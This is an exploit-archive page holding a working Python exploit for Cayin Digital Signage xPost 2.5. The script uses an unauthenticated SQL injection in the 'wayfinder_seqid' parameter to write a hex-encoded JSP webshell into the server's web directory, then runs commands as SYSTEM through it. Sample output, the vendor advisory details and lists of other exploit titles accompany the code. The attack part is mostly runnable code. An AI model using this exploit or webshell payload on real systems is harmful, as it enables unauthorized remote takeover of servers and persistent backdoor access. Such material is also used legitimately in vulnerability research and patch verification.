Menu

Search for hundreds of thousands of exploits

"Cayin Digital Signage System xPost 2.5 - Remote Command Injection"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-06-04

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
# Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE:  N/A

#!/usr/bin/env python3
#
#
# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: 2.5.18103
#                   2.0
#                   1.0
#
# Summary: CAYIN xPost is the web-based application software, which offers a
# combination of essential tools to create rich contents for digital signage in
# different vertical markets. It provides an easy-to-use platform for instant
# data entry and further extends the usage of CAYIN SMP players to meet users'
# requirements of frequent, daily maintenance.
#
# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability.
# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp
# is not properly sanitised before being returned to the user or used in SQL queries.
# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code
# and execute SYSTEM commands.
#
# --------------------------------------------------------------------------------
# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888
# # Injecting...
# # Executing...
#
# Command: whoami
#
# nt authority\system
#
#
# You have a webshell @ http://192.168.2.1:8888/thricer.jsp
# lqwrm@zslab:~$
# --------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 10 Home
#            Microsoft Windows 8.1
#            Microsoft Windows Server 2016
#            Microsoft Windows Server 2012
#            Microsoft Windows 7 Ultimate SP1
#            Apache Tomcat/9.0.1
#            MySQL/5.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5571
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php
#
#
# 15.05.2020
#

import requests as req
import time as vremeto
import sys as sistemot
import re as regularno

if len(sistemot.argv) < 2:
    print("Cayin xPost 2.5 Pre-Auth SQLi RCE")
    print("Usage: ./wayfinder.py ip:port")
    sistemot.exit(19)
else:
    ip = sistemot.argv[1]

filename = "thricer.jsp"
urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid="
constr = "-251' UNION ALL SELECT "

print("# Injecting...")

cmdjsp  = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612"
cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64"
cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0"
cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f"
cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484"
cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c"
cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505"
cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f"
cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657"
cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70"
cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617"
cmdjsp += "2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050"
cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786"
cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020"
cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757"
cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d"
cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496"
cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561"
cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726"
cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20"
cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746"
cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064"
cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2"
cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a"
cmdjsp += "0a0a"

columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL "
sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -"
mysqli = constr + cmdjsp + columns + sqlwrite
r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True)
vremeto.sleep(1)

print("# Executing...")

r = req.get("http://" + ip + "/" + filename + "?cmd=whoami")
clean = regularno.compile("<pre>(.*)</pre>", flags = regularno.S).search(r.text)
clean = clean.group(1).replace("<BR>", "\n")
print(clean)
print("You have a webshell @ http://" + ip + "/" + filename)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation" webapps hardware LiquidWorm
2020-10-27 "Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root" remote hardware LiquidWorm
2020-10-27 "GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse" remote hardware LiquidWorm
2020-10-27 "TDM Digital Signage PC Player 4.1 - Insecure File Permissions" local windows LiquidWorm
2020-10-26 "ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure" webapps hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal" webapps hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2020-10-01 "Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow" remote hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)" webapps hardware LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-14 "Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path" local windows LiquidWorm
2020-08-28 "Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation" webapps hardware LiquidWorm
2020-08-26 "Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal" webapps multiple LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass" webapps hardware LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure" webapps hardware LiquidWorm
2020-08-07 "All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected